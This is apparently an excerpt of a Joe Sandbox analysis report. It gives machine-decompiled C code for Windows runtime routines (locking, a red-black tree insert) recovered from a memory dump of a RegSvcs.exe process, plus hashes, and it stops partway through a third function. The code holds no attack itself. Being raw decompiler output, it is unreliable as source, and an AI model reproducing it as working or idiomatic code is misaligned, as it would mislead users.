                                          				void* _t132;
                                          				signed char _t133;
                                          				intOrPtr _t135;
                                          				signed int _t137;
                                          				signed int _t140;
                                          				signed int* _t144;
                                          				signed int* _t145;
                                          				intOrPtr _t146;
                                          				signed int _t147;
                                          				signed char* _t148;
                                          				signed int _t149;
                                          				signed int _t153;
                                          				signed int _t169;
                                          				signed int _t174;
                                          				signed int _t180;
                                          				void* _t197;
                                          				void* _t198;
                                          				signed int _t201;
                                          				intOrPtr* _t202;
                                          				intOrPtr* _t205;
                                          				signed int _t210;
                                          				signed int _t215;
                                          				signed int _t218;
                                          				signed char _t221;
                                          				signed int _t226;
                                          				char _t227;
                                          				signed int _t228;
                                          				void* _t229;
                                          				unsigned int _t231;
                                          				void* _t235;
                                          				signed int _t240;
                                          				signed int _t241;
                                          				void* _t242;
                                          				signed int _t246;
                                          				signed int _t248;
                                          				signed int _t252;
                                          				signed int _t253;
                                          				void* _t254;
                                          				intOrPtr* _t256;
                                          				intOrPtr _t257;
                                          				unsigned int _t262;
                                          				signed int _t265;
                                          				void* _t267;
                                          				signed int _t275;
                                          
                                          				_t198 = __ebx;
                                          				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                          				_v68 = __ecx;
                                          				_v73 = 0;
                                          				_t201 = __edx & 0x00002000;
                                          				_t128 = __edx & 0xffffdfff;
                                          				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                          				_v72 = _t128;
                                          				if((_t128 & 0x00000008) != 0) {
                                          					__eflags = _t128 - 8;
                                          					if(_t128 != 8) {
                                          						L69:
                                          						_t129 = 0xc000000d;
                                          						goto L23;
                                          					} else {
                                          						_t130 = 0;
                                          						_v72 = 0;
                                          						_v75 = 1;
                                          						L2:
                                          						_v74 = 1;
                                          						_t226 =  *0x13e8714; // 0x0
                                          						if(_t226 != 0) {
                                          							__eflags = _t201;
                                          							if(_t201 != 0) {
                                          								L62:
                                          								_v74 = 1;
                                          								L63:
                                          								_t130 = _t226 & 0xffffdfff;
                                          								_v72 = _t130;
                                          								goto L3;
                                          							}
                                          							_v74 = _t201;
                                          							__eflags = _t226 & 0x00002000;
                                          							if((_t226 & 0x00002000) == 0) {
                                          								goto L63;
                                          							}
                                          							goto L62;
                                          						}
                                          						L3:
                                          						_t227 = _v75;
                                          						L4:
                                          						_t240 = 0;
                                          						_v56 = 0;
                                          						_t252 = _t130 & 0x00000100;
                                          						if(_t252 != 0 || _t227 != 0) {
                                          							_t240 = _v68;
                                          							_t132 = E01322EB0(_t240);
                                          							__eflags = _t132 - 2;
                                          							if(_t132 != 2) {
                                          								__eflags = _t132 - 1;
                                          								if(_t132 == 1) {
                                          									goto L25;
                                          								}
                                          								__eflags = _t132 - 6;
                                          								if(_t132 == 6) {
                                          									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                          									if( *((short*)(_t240 + 4)) != 0x3f) {
                                          										goto L40;
                                          									}
                                          									_t197 = E01322EB0(_t240 + 8);
                                          									__eflags = _t197 - 2;
                                          									if(_t197 == 2) {
                                          										goto L25;
                                          									}
                                          								}
                                          								L40:
                                          								_t133 = 1;
                                          								L26:
                                          								_t228 = _v75;
                                          								_v56 = _t240;
                                          								__eflags = _t133;
                                          								if(_t133 != 0) {
                                          									__eflags = _t228;
                                          									if(_t228 == 0) {
                                          										L43:
                                          										__eflags = _v72;
                                          										if(_v72 == 0) {
                                          											goto L8;
                                          										}
                                          										goto L69;
                                          									}
                                          									_t133 = E012F58EC(_t240);
                                          									_t221 =  *0x13e5cac; // 0x16
                                          									__eflags = _t221 & 0x00000040;
                                          									if((_t221 & 0x00000040) != 0) {
                                          										_t228 = 0;
                                          										__eflags = _t252;
                                          										if(_t252 != 0) {
                                          											goto L43;
                                          										}
                                          										_t133 = _v72;
                                          										goto L7;
                                          									}
                                          									goto L43;
                                          								} else {
                                          									_t133 = _v72;
                                          									goto L6;
                                          								}
                                          							}
                                          							L25:
                                          							_t133 = _v73;
                                          							goto L26;
                                          						} else {
                                          							L6:
                                          							_t221 =  *0x13e5cac; // 0x16
                                          							L7:
                                          							if(_t133 != 0) {
                                          								__eflags = _t133 & 0x00001000;
                                          								if((_t133 & 0x00001000) != 0) {
                                          									_t133 = _t133 | 0x00000a00;
                                          									__eflags = _t221 & 0x00000004;
                                          									if((_t221 & 0x00000004) != 0) {
                                          										_t133 = _t133 | 0x00000400;
                                          									}
                                          								}
                                          								__eflags = _t228;
                                          								if(_t228 != 0) {
                                          									_t133 = _t133 | 0x00000100;
                                          								}
                                          								_t229 = E01334A2C(0x13e6e40, 0x1334b30, _t133, _t240);
                                          								__eflags = _t229;
                                          								if(_t229 == 0) {
                                          									_t202 = _a20;
                                          									goto L100;
                                          								} else {
                                          									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                          									L15:
                                          									_t202 = _a20;
                                          									 *_t202 = _t135;
                                          									if(_t229 == 0) {
                                          										L100:
                                          										 *_a4 = 0;
                                          										_t137 = _a8;
                                          										__eflags = _t137;
                                          										if(_t137 != 0) {
                                          											 *_t137 = 0;
                                          										}
                                          										 *_t202 = 0;
                                          										_t129 = 0xc0000017;
                                          										goto L23;
                                          									} else {
                                          										_t242 = _a16;
                                          										if(_t242 != 0) {
                                          											_t254 = _t229;
                                          											memcpy(_t242, _t254, 0xd << 2);
                                          											_t267 = _t267 + 0xc;
                                          											_t242 = _t254 + 0x1a;
                                          										}
                                          										_t205 = _a4;
                                          										_t25 = _t229 + 0x48; // 0x48
                                          										 *_t205 = _t25;
                                          										_t140 = _a8;
                                          										if(_t140 != 0) {
                                          											__eflags =  *((char*)(_t267 + 0xa));
                                          											if( *((char*)(_t267 + 0xa)) != 0) {
                                          												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                          											} else {
                                          												 *_t140 = 0;
                                          											}
                                          										}
                                          										_t256 = _a12;
                                          										if(_t256 != 0) {
                                          											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                          										}
                                          										_t257 =  *_t205;
                                          										_v48 = 0;
                                          										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                          										_v56 = 0;
                                          										_v52 = 0;
                                          										_t144 =  *( *[fs:0x30] + 0x50);
                                          										if(_t144 != 0) {
                                          											__eflags =  *_t144;
                                          											if( *_t144 == 0) {
                                          												goto L20;
                                          											}
                                          											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          											goto L21;
                                          										} else {
                                          											L20:
                                          											_t145 = 0x7ffe0384;
                                          											L21:
                                          											if( *_t145 != 0) {
                                          												_t146 =  *[fs:0x30];
                                          												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                          												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                          													_t147 = E01317D50();
                                          													__eflags = _t147;
                                          													if(_t147 == 0) {
                                          														_t148 = 0x7ffe0385;
                                          													} else {
                                          														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                          													}
                                          													__eflags =  *_t148 & 0x00000020;
                                          													if(( *_t148 & 0x00000020) != 0) {
                                          														_t149 = _v72;
                                          														__eflags = _t149;
                                          														if(__eflags == 0) {
                                          															_t149 = 0x12d5c80;
                                          														}
                                          														_push(_t149);
                                          														_push( &_v48);
                                          														 *((char*)(_t267 + 0xb)) = E0132F6E0(_t198, _t242, _t257, __eflags);
                                          														_push(_t257);
                                          														_push( &_v64);
                                          														_t153 = E0132F6E0(_t198, _t242, _t257, __eflags);
                                          														__eflags =  *((char*)(_t267 + 0xb));
                                          														if( *((char*)(_t267 + 0xb)) != 0) {
                                          															__eflags = _t153;
                                          															if(_t153 != 0) {
                                          																__eflags = 0;
                                          																E01377016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                          																L01312400(_t267 + 0x20);
                                          															}
                                          															L01312400( &_v64);
                                          														}
                                          													}
                                          												}
                                          											}
                                          											_t129 = 0;
                                          											L23:
                                          											return _t129;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L8:
                                          							_t275 = _t240;
                                          							if(_t275 != 0) {
                                          								_v73 = 0;
                                          								_t253 = 0;
                                          								__eflags = 0;
                                          								L29:
                                          								_push(0);
                                          								_t241 = E01322397(_t240);
                                          								__eflags = _t241;
                                          								if(_t241 == 0) {
                                          									_t229 = 0;
                                          									L14:
                                          									_t135 = 0;
                                          									goto L15;
                                          								}
                                          								__eflags =  *((char*)(_t267 + 0xb));
                                          								 *(_t241 + 0x34) = 1;
                                          								if( *((char*)(_t267 + 0xb)) != 0) {
                                          									E01312280(_t134, 0x13e8608);
                                          									__eflags =  *0x13e6e48 - _t253; // 0x0
                                          									if(__eflags != 0) {
                                          										L48:
                                          										_t253 = 0;
                                          										__eflags = 0;
                                          										L49:
                                          										E0130FFB0(_t198, _t241, 0x13e8608);
                                          										__eflags = _t253;
                                          										if(_t253 != 0) {
                                          											L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                          										}
                                          										goto L31;
                                          									}
                                          									 *0x13e6e48 = _t241;
                                          									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                          									__eflags = _t253;
                                          									if(_t253 != 0) {
                                          										_t57 = _t253 + 0x34;
                                          										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                          										__eflags =  *_t57;
                                          										if( *_t57 == 0) {
                                          											goto L49;
                                          										}
                                          									}
                                          									goto L48;
                                          								}
                                          								L31:
                                          								_t229 = _t241;
                                          								goto L14;
                                          							}
                                          							_v73 = 1;
                                          							_v64 = _t240;
                                          							asm("lock bts dword [esi], 0x0");
                                          							if(_t275 < 0) {
                                          								_t231 =  *0x13e8608; // 0x0
                                          								while(1) {
                                          									_v60 = _t231;
                                          									__eflags = _t231 & 0x00000001;
                                          									if((_t231 & 0x00000001) != 0) {
                                          										goto L76;
                                          									}
                                          									_t73 = _t231 + 1; // 0x1
                                          									_t210 = _t73;
                                          									asm("lock cmpxchg [edi], ecx");
                                          									__eflags = _t231 - _t231;
                                          									if(_t231 != _t231) {
                                          										L92:
                                          										_t133 = E01326B90(_t210,  &_v64);
                                          										_t262 =  *0x13e8608; // 0x0
                                          										L93:
                                          										_t231 = _t262;
                                          										continue;
                                          									}
                                          									_t240 = _v56;
                                          									goto L10;
                                          									L76:
                                          									_t169 = E0132E180(_t133);
                                          									__eflags = _t169;
                                          									if(_t169 != 0) {
                                          										_push(0xc000004b);
                                          										_push(0xffffffff);
                                          										E013397C0();
                                          										_t231 = _v68;
                                          									}
                                          									_v72 = 0;
                                          									_v24 =  *( *[fs:0x18] + 0x24);
                                          									_v16 = 3;
                                          									_v28 = 0;
                                          									__eflags = _t231 & 0x00000002;
                                          									if((_t231 & 0x00000002) == 0) {
                                          										_v32 =  &_v36;
                                          										_t174 = _t231 >> 4;
                                          										__eflags = 1 - _t174;
                                          										_v20 = _t174;
                                          										asm("sbb ecx, ecx");
                                          										_t210 = 3 |  &_v36;
                                          										__eflags = _t174;
                                          										if(_t174 == 0) {
                                          											_v20 = 0xfffffffe;
                                          										}
                                          									} else {
                                          										_v32 = 0;
                                          										_v20 = 0xffffffff;
                                          										_v36 = _t231 & 0xfffffff0;
                                          										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                          										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                          									}
                                          									asm("lock cmpxchg [edi], esi");
                                          									_t262 = _t231;
                                          									__eflags = _t262 - _t231;
                                          									if(_t262 != _t231) {
                                          										goto L92;
                                          									} else {
                                          										__eflags = _v72;
                                          										if(_v72 != 0) {
                                          											E0133006A(0x13e8608, _t210);
                                          										}
                                          										__eflags =  *0x7ffe036a - 1;
                                          										if(__eflags <= 0) {
                                          											L89:
                                          											_t133 =  &_v16;
                                          											asm("lock btr dword [eax], 0x1");
                                          											if(__eflags >= 0) {
                                          												goto L93;
                                          											} else {
                                          												goto L90;
                                          											}
                                          											do {
                                          												L90:
                                          												_push(0);
                                          												_push(0x13e8608);
                                          												E0133B180();
                                          												_t133 = _v24;
                                          												__eflags = _t133 & 0x00000004;
                                          											} while ((_t133 & 0x00000004) == 0);
                                          											goto L93;
                                          										} else {
                                          											_t218 =  *0x13e6904; // 0x400
                                          											__eflags = _t218;
                                          											if(__eflags == 0) {
                                          												goto L89;
                                          											} else {
                                          												goto L87;
                                          											}
                                          											while(1) {
                                          												L87:
                                          												__eflags = _v16 & 0x00000002;
                                          												if(__eflags == 0) {
                                          													goto L89;
                                          												}
                                          												asm("pause");
                                          												_t218 = _t218 - 1;
                                          												__eflags = _t218;
                                          												if(__eflags != 0) {
                                          													continue;
                                          												}
                                          												goto L89;
                                          											}
                                          											goto L89;
                                          										}
                                          									}
                                          								}
                                          							}
                                          							L10:
                                          							_t229 =  *0x13e6e48; // 0x0
                                          							_v72 = _t229;
                                          							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          								E0130FFB0(_t198, _t240, 0x13e8608);
                                          								_t253 = _v76;
                                          								goto L29;
                                          							} else {
                                          								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                          								asm("lock cmpxchg [esi], ecx");
                                          								_t215 = 1;
                                          								if(1 != 1) {
                                          									while(1) {
                                          										_t246 = _t215 & 0x00000006;
                                          										_t180 = _t215;
                                          										__eflags = _t246 - 2;
                                          										_v56 = _t246;
                                          										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                          										asm("lock cmpxchg [edi], esi");
                                          										_t248 = _v56;
                                          										__eflags = _t180 - _t215;
                                          										if(_t180 == _t215) {
                                          											break;
                                          										}
                                          										_t215 = _t180;
                                          									}
                                          									__eflags = _t248 - 2;
                                          									if(_t248 == 2) {
                                          										__eflags = 0;
                                          										E013300C2(0x13e8608, 0, _t235);
                                          									}
                                          									_t229 = _v72;
                                          								}
                                          								goto L14;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t227 = 0;
                                          				_v75 = 0;
                                          				if(_t128 != 0) {
                                          					goto L4;
                                          				}
                                          				goto L2;
                                          			}











































































                                          0x013659ee
                                          0x013659f3
                                          0x013659f3
                                          0x00000000
                                          0x01322186
                                          0x0132214f
                                          0x01322106
                                          0x01322266
                                          0x013220d8
                                          0x013220da
                                          0x013220e0
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a46de269b9836959c89c1756d78493e5cc0ff50cbecb8d5c81b702327845016c
                                          • Instruction ID: e04d409ef860998f0f3c84acb9452061b173cffd701d87f3a410b0b4a6d0300e
                                          • Opcode Fuzzy Hash: a46de269b9836959c89c1756d78493e5cc0ff50cbecb8d5c81b702327845016c
                                          • Instruction Fuzzy Hash: 6DF12531A083119FE736DF2CC840B6B7BE9AF8636CF14852DE9959B285D775D840CB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E0130B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _t117;
                                          				signed int _t119;
                                          				signed int _t120;
                                          				signed int _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t126;
                                          				signed int _t134;
                                          				signed int _t139;
                                          				signed char _t143;
                                          				signed int _t144;
                                          				signed int _t146;
                                          				signed int _t148;
                                          				signed int* _t150;
                                          				signed int _t152;
                                          				signed int _t161;
                                          				signed char _t165;
                                          				signed int _t167;
                                          				signed int _t170;
                                          				signed int _t174;
                                          				signed char _t177;
                                          				signed int _t178;
                                          				signed int _t181;
                                          				signed int _t182;
                                          				signed int _t187;
                                          				signed int _t190;
                                          				signed int _t192;
                                          				signed int _t194;
                                          				signed int _t196;
                                          				signed int _t199;
                                          				signed int _t202;
                                          				signed int _t208;
                                          				signed int _t211;
                                          
                                          				_t182 = _a16;
                                          				_t178 = _a8;
                                          				_t161 = _a4;
                                          				 *_t182 = 0;
                                          				 *(_t182 + 4) = 0;
                                          				_t5 = _t161 + 4; // 0x4
                                          				_t117 =  *_t5 & 0x00000001;
                                          				if(_t178 == 0) {
                                          					 *_t161 = _t182;
                                          					 *(_t161 + 4) = _t182;
                                          					if(_t117 != 0) {
                                          						_t117 = _t182 | 0x00000001;
                                          						 *(_t161 + 4) = _t117;
                                          					}
                                          					 *(_t182 + 8) = 0;
                                          					goto L43;
                                          				} else {
                                          					_t208 = _t182 ^ _t178;
                                          					_t192 = _t208;
                                          					if(_t117 == 0) {
                                          						_t192 = _t182;
                                          					}
                                          					_t117 = _a12 & 0x000000ff;
                                          					 *(_t178 + _t117 * 4) = _t192;
                                          					if(( *(_t161 + 4) & 0x00000001) == 0) {
                                          						_t208 = _t178;
                                          					}
                                          					 *(_t182 + 8) = _t208 | 0x00000001;
                                          					if(_a12 == 0) {
                                          						_t14 = _t161 + 4; // 0x4
                                          						_t177 =  *_t14;
                                          						_t117 = _t177 & 0xfffffffe;
                                          						if(_t178 == _t117) {
                                          							_t117 = _a4;
                                          							 *(_t117 + 4) = _t182;
                                          							if((_t177 & 0x00000001) != 0) {
                                          								_t161 = _a4;
                                          								_t117 = _t182 | 0x00000001;
                                          								 *(_t161 + 4) = _t117;
                                          							} else {
                                          								_t161 = _t117;
                                          							}
                                          						} else {
                                          							_t161 = _a4;
                                          						}
                                          					}
                                          					if(( *(_t178 + 8) & 0x00000001) == 0) {
                                          						L42:
                                          						L43:
                                          						return _t117;
                                          					} else {
                                          						_t19 = _t161 + 4; // 0x4
                                          						_t165 =  *_t19 & 0x00000001;
                                          						do {
                                          							_t211 =  *(_t178 + 8) & 0xfffffffc;
                                          							if(_t165 != 0) {
                                          								if(_t211 != 0) {
                                          									_t211 = _t211 ^ _t178;
                                          								}
                                          							}
                                          							_t119 =  *_t211;
                                          							if(_t165 != 0) {
                                          								if(_t119 != 0) {
                                          									_t119 = _t119 ^ _t211;
                                          								}
                                          							}
                                          							_t120 = 0;
                                          							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
                                          							_v8 = _t121;
                                          							_t122 = _t121 ^ 0x00000001;
                                          							_v16 = _t122;
                                          							_t123 =  *(_t211 + _t122 * 4);
                                          							if(_t165 != 0) {
                                          								if(_t123 == 0) {
                                          									goto L20;
                                          								}
                                          								_t123 = _t123 ^ _t211;
                                          								goto L13;
                                          							} else {
                                          								L13:
                                          								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
                                          									L20:
                                          									_t194 = _v16;
                                          									if((_a12 & 0x000000ff) != _v8) {
                                          										_t126 =  *(_t182 + 8) & 0xfffffffc;
                                          										_t167 = _t165 & 1;
                                          										_v12 = _t167;
                                          										if(_t167 != 0) {
                                          											if(_t126 != 0) {
                                          												_t126 = _t126 ^ _t182;
                                          											}
                                          										}
                                          										if(_t126 != _t178) {
                                          											L83:
                                          											_t178 = 0x1d;
                                          											asm("int 0x29");
                                          											goto L84;
                                          										} else {
                                          											_t126 =  *(_t178 + _t194 * 4);
                                          											if(_t167 != 0) {
                                          												if(_t126 != 0) {
                                          													_t126 = _t126 ^ _t178;
                                          												}
                                          											}
                                          											if(_t126 != _t182) {
                                          												goto L83;
                                          											} else {
                                          												_t126 =  *(_t211 + _v8 * 4);
                                          												if(_t167 != 0) {
                                          													if(_t126 != 0) {
                                          														_t126 = _t126 ^ _t211;
                                          													}
                                          												}
                                          												if(_t126 != _t178) {
                                          													goto L83;
                                          												} else {
                                          													_t77 = _t178 + 8; // 0x8
                                          													_t150 = _t77;
                                          													_v20 = _t150;
                                          													_t126 =  *_t150 & 0xfffffffc;
                                          													if(_t167 != 0) {
                                          														if(_t126 != 0) {
                                          															_t126 = _t126 ^ _t178;
                                          														}
                                          													}
                                          													if(_t126 != _t211) {
                                          														goto L83;
                                          													} else {
                                          														_t202 = _t211 ^ _t182;
                                          														_t152 = _t202;
                                          														if(_t167 == 0) {
                                          															_t152 = _t182;
                                          														}
                                          														 *(_t211 + _v8 * 4) = _t152;
                                          														_t170 = _v12;
                                          														if(_t170 == 0) {
                                          															_t202 = _t211;
                                          														}
                                          														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
                                          														_t126 =  *(_t182 + _v8 * 4);
                                          														if(_t170 != 0) {
                                          															if(_t126 == 0) {
                                          																L58:
                                          																if(_t170 != 0) {
                                          																	if(_t126 != 0) {
                                          																		_t126 = _t126 ^ _t178;
                                          																	}
                                          																}
                                          																 *(_t178 + _v16 * 4) = _t126;
                                          																_t199 = _t178 ^ _t182;
                                          																if(_t170 != 0) {
                                          																	_t178 = _t199;
                                          																}
                                          																 *(_t182 + _v8 * 4) = _t178;
                                          																if(_t170 == 0) {
                                          																	_t199 = _t182;
                                          																}
                                          																 *_v20 =  *_v20 & 0x00000003 | _t199;
                                          																_t178 = _t182;
                                          																_t167 =  *((intOrPtr*)(_a4 + 4));
                                          																goto L21;
                                          															}
                                          															_t126 = _t126 ^ _t182;
                                          														}
                                          														if(_t126 != 0) {
                                          															_t167 =  *(_t126 + 8);
                                          															_t194 = _t167 & 0xfffffffc;
                                          															if(_v12 != 0) {
                                          																L84:
                                          																if(_t194 != 0) {
                                          																	_t194 = _t194 ^ _t126;
                                          																}
                                          															}
                                          															if(_t194 != _t182) {
                                          																goto L83;
                                          															}
                                          															if(_v12 != 0) {
                                          																_t196 = _t126 ^ _t178;
                                          															} else {
                                          																_t196 = _t178;
                                          															}
                                          															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
                                          															_t170 = _v12;
                                          														}
                                          														goto L58;
                                          													}
                                          												}
                                          											}
                                          										}
                                          									}
                                          									L21:
                                          									_t182 = _v8 ^ 0x00000001;
                                          									_t126 =  *(_t178 + 8) & 0xfffffffc;
                                          									_v8 = _t182;
                                          									_t194 = _t167 & 1;
                                          									if(_t194 != 0) {
                                          										if(_t126 != 0) {
                                          											_t126 = _t126 ^ _t178;
                                          										}
                                          									}
                                          									if(_t126 != _t211) {
                                          										goto L83;
                                          									} else {
                                          										_t134 = _t182 ^ 0x00000001;
                                          										_v16 = _t134;
                                          										_t126 =  *(_t211 + _t134 * 4);
                                          										if(_t194 != 0) {
                                          											if(_t126 != 0) {
                                          												_t126 = _t126 ^ _t211;
                                          											}
                                          										}
                                          										if(_t126 != _t178) {
                                          											goto L83;
                                          										} else {
                                          											_t167 = _t211 + 8;
                                          											_t182 =  *_t167 & 0xfffffffc;
                                          											_v20 = _t167;
                                          											if(_t194 != 0) {
                                          												if(_t182 == 0) {
                                          													L80:
                                          													_t126 = _a4;
                                          													if( *_t126 != _t211) {
                                          														goto L83;
                                          													}
                                          													 *_t126 = _t178;
                                          													L34:
                                          													if(_t194 != 0) {
                                          														if(_t182 != 0) {
                                          															_t182 = _t182 ^ _t178;
                                          														}
                                          													}
                                          													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
                                          													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
                                          													if(_t194 != 0) {
                                          														if(_t139 == 0) {
                                          															goto L37;
                                          														}
                                          														_t126 = _t139 ^ _t178;
                                          														goto L36;
                                          													} else {
                                          														L36:
                                          														if(_t126 != 0) {
                                          															_t167 =  *(_t126 + 8);
                                          															_t182 = _t167 & 0xfffffffc;
                                          															if(_t194 != 0) {
                                          																if(_t182 != 0) {
                                          																	_t182 = _t182 ^ _t126;
                                          																}
                                          															}
                                          															if(_t182 != _t178) {
                                          																goto L83;
                                          															} else {
                                          																if(_t194 != 0) {
                                          																	_t190 = _t126 ^ _t211;
                                          																} else {
                                          																	_t190 = _t211;
                                          																}
                                          																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
                                          																_t167 = _v20;
                                          																goto L37;
                                          															}
                                          														}
                                          														L37:
                                          														if(_t194 != 0) {
                                          															if(_t139 != 0) {
                                          																_t139 = _t139 ^ _t211;
                                          															}
                                          														}
                                          														 *(_t211 + _v16 * 4) = _t139;
                                          														_t187 = _t211 ^ _t178;
                                          														if(_t194 != 0) {
                                          															_t211 = _t187;
                                          														}
                                          														 *(_t178 + _v8 * 4) = _t211;
                                          														if(_t194 == 0) {
                                          															_t187 = _t178;
                                          														}
                                          														_t143 =  *_t167 & 0x00000003 | _t187;
                                          														 *_t167 = _t143;
                                          														_t117 = _t143 | 0x00000001;
                                          														 *_t167 = _t117;
                                          														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                                          														goto L42;
                                          													}
                                          												}
                                          												_t182 = _t182 ^ _t211;
                                          											}
                                          											if(_t182 == 0) {
                                          												goto L80;
                                          											}
                                          											_t144 =  *(_t182 + 4);
                                          											if(_t194 != 0) {
                                          												if(_t144 != 0) {
                                          													_t144 = _t144 ^ _t182;
                                          												}
                                          											}
                                          											if(_t144 == _t211) {
                                          												if(_t194 != 0) {
                                          													_t146 = _t182 ^ _t178;
                                          												} else {
                                          													_t146 = _t178;
                                          												}
                                          												 *(_t182 + 4) = _t146;
                                          												goto L34;
                                          											} else {
                                          												_t126 =  *_t182;
                                          												if(_t194 != 0) {
                                          													if(_t126 != 0) {
                                          														_t126 = _t126 ^ _t182;
                                          													}
                                          												}
                                          												if(_t126 != _t211) {
                                          													goto L83;
                                          												} else {
                                          													if(_t194 != 0) {
                                          														_t148 = _t182 ^ _t178;
                                          													} else {
                                          														_t148 = _t178;
                                          													}
                                          													 *_t182 = _t148;
                                          													goto L34;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                                          									_t182 = _t211;
                                          									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
                                          									_t174 = _a4;
                                          									_t117 =  *(_t211 + 8);
                                          									_t181 = _t117 & 0xfffffffc;
                                          									if(( *(_t174 + 4) & 0x00000001) != 0) {
                                          										if(_t181 == 0) {
                                          											goto L42;
                                          										}
                                          										_t178 = _t181 ^ _t211;
                                          									}
                                          									if(_t178 == 0) {
                                          										goto L42;
                                          									}
                                          									goto L17;
                                          								}
                                          							}
                                          							L17:
                                          							 *(_t211 + 8) = _t117 | 0x00000001;
                                          							_t40 = _t174 + 4; // 0x4
                                          							_t117 =  *_t178;
                                          							_t165 =  *_t40 & 0x00000001;
                                          							if(_t165 != 0) {
                                          								if(_t117 != 0) {
                                          									_t117 = _t117 ^ _t178;
                                          								}
                                          							}
                                          							_a12 = _t211 != _t117;
                                          						} while (( *(_t178 + 8) & 0x00000001) != 0);
                                          						goto L42;
                                          					}
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction ID: 37dfe97319a5bf62793c058e7fcdfd59e6ed83b805e7892ebe7a66401d23af8e
                                          • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                                          • Instruction Fuzzy Hash: C8D12A39700306CBDB27CE6CC4A076AFBE9AF8465CB298168DC55CB3CAE731D8419750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 99%
                                          			E012F0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
                                          				signed char _v5;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				signed char _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				intOrPtr _v52;
                                          				intOrPtr _v56;
                                          				intOrPtr _v60;
                                          				intOrPtr _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				intOrPtr _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				signed int _v96;
                                          				unsigned int _v100;
                                          				signed int _t159;
                                          				unsigned int _t160;
                                          				signed int _t162;
                                          				unsigned int _t163;
                                          				signed int _t180;
                                          				signed int _t192;
                                          				signed int _t193;
                                          				unsigned int _t194;
                                          				signed char _t196;
                                          				signed int _t197;
                                          				signed char _t198;
                                          				signed char _t199;
                                          				unsigned int _t200;
                                          				unsigned int _t202;
                                          				unsigned int _t204;
                                          				unsigned int _t205;
                                          				unsigned int _t209;
                                          				signed int _t210;
                                          				signed int _t211;
                                          				unsigned int _t212;
                                          				signed char _t213;
                                          				signed short* _t214;
                                          				intOrPtr _t215;
                                          				signed int _t216;
                                          				signed int _t217;
                                          				unsigned int _t218;
                                          				signed int _t220;
                                          				signed int _t221;
                                          				signed short _t223;
                                          				signed char _t224;
                                          				signed int _t229;
                                          				signed int _t231;
